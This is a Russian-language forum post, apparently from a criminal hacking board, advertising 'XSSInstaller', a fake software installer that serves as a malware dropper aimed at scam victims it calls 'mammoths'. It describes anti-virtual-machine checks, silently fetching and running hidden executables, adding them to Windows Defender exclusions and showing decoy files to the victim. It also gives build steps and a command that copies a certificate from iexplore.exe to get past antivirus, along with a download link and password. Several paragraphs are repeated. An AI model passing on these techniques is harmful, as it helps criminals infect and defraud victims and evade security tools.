Давайте представим ситуацию: допустим, вы хотите пролить трафик на YouTube, но мамонты становятся умнее, и уже не ведутся на ворованные ролики с чужими софтами. Вот тут-то и вступает в дело мой инсталлер с интерфейсом обычной программы, с которым можно снять свой собственный ролик и, тем самым, повысить доверие у потенциальных мамонтов.
Также есть небольшая защита от Windows Defender в виде добавления ваших файлов в исключения Windows Defender. Также присутствует защита от виртуальных машин, помогающая избавиться от надоедливых уведомлений от логов с серверов антивирусов.
Лично на своем опыте убедился в том, что если работаешь точечно и лично ведешь диалог с жертвой, то имя программы с интерфейсом, а тем более еще и с подкачкой реально работающих файлов, доверие многократно увеличивается. Так что, если вы льете трафик, подобный инсталлер будет однозначным плюсом и никогда не будет лишним.
Также есть небольшая защита от Windows Defender в виде добавления ваших файлов в исключения Windows Defender. Также присутствует защита от виртуальных машин, помогающая избавиться от надоедливых уведомлений от логов с серверов антивирусов.
Лично на своем опыте убедился в том, что если работаешь точечно и лично ведешь диалог с жертвой, то имя программы с интерфейсом, а тем более еще и с подкачкой реально работающих файлов, доверие многократно увеличивается. Так что, если вы льете трафик, подобный инсталлер будет однозначным плюсом и никогда не будет лишним.
Первым шагом жертва должна запустить инсталлер. Сразу после запуска происходит проверка на то, запущен ли инсталлер на обычном компьютере или виртуальной машине. Затем, после нажатия на кнопку "Install", в первую очередь происходит подгрузка ваших скрытых исполняемых файлов (exe) и добавление их в исключения Windows Defender. Только после этого начинается подгрузка видимых для пользователя файлов с работающим индикатором прогресса загрузки.
Также, поскольку на инсталлер наложен поддельный сертификат, это помогает обойти защиту некоторых антивирусов, так как некоторые из них проверяют сам факт наличия сертификата, а не его действительность.
Также, поскольку на инсталлер наложен поддельный сертификат, это помогает обойти защиту некоторых антивирусов, так как некоторые из них проверяют сам факт наличия сертификата, а не его действительность.
1. Запустите XSSInstaller.sln
2. Затем откройте файл Config.cs
3. Замените ссылки на exe которые будут подкачиваться и запускаться (например прямые ссылки из Discord)
4. Замените ссылки на zip которые будут подкачиваться и будут видны пользователю (например прямые ссылки из Discord)
5. В Visual Studio скомпилируйте проект в Release
2. Затем откройте файл Config.cs
3. Замените ссылки на exe которые будут подкачиваться и запускаться (например прямые ссылки из Discord)
4. Замените ссылки на zip которые будут подкачиваться и будут видны пользователю (например прямые ссылки из Discord)
5. В Visual Studio скомпилируйте проект в Release
1. Откройте папку Certificate transfer
2. Закиньте туда получившийся XSSInstaller.exe
3. Откройте cmd в папке Certificate transfer
4. Введите команду "python Certificate_transfer.py -i iexplore.exe -t XSSInstaller.exe -o Certificated_XSSInstaller.exe"
Результат:
2. Закиньте туда получившийся XSSInstaller.exe
3. Откройте cmd в папке Certificate transfer
4. Введите команду "python Certificate_transfer.py -i iexplore.exe -t XSSInstaller.exe -o Certificated_XSSInstaller.exe"
Результат:
Пароль: XSS
Ссылка: https://mega.nz/file/hS1WCKRY#gl4SThHbdSrqKp4NjxfpQHFRsO5w1TwAJSOlaLiEV-Y
Ссылка: https://mega.nz/file/hS1WCKRY#gl4SThHbdSrqKp4NjxfpQHFRsO5w1TwAJSOlaLiEV-Y
Последнее редактирование модератором:
